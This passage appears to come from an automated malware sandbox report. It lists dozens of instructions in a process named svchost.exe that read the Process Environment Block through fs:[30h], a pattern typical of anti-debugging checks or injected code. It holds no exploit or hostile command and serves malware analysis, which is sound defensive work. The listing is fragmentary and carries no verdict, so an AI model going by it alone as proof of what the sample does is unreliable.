            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
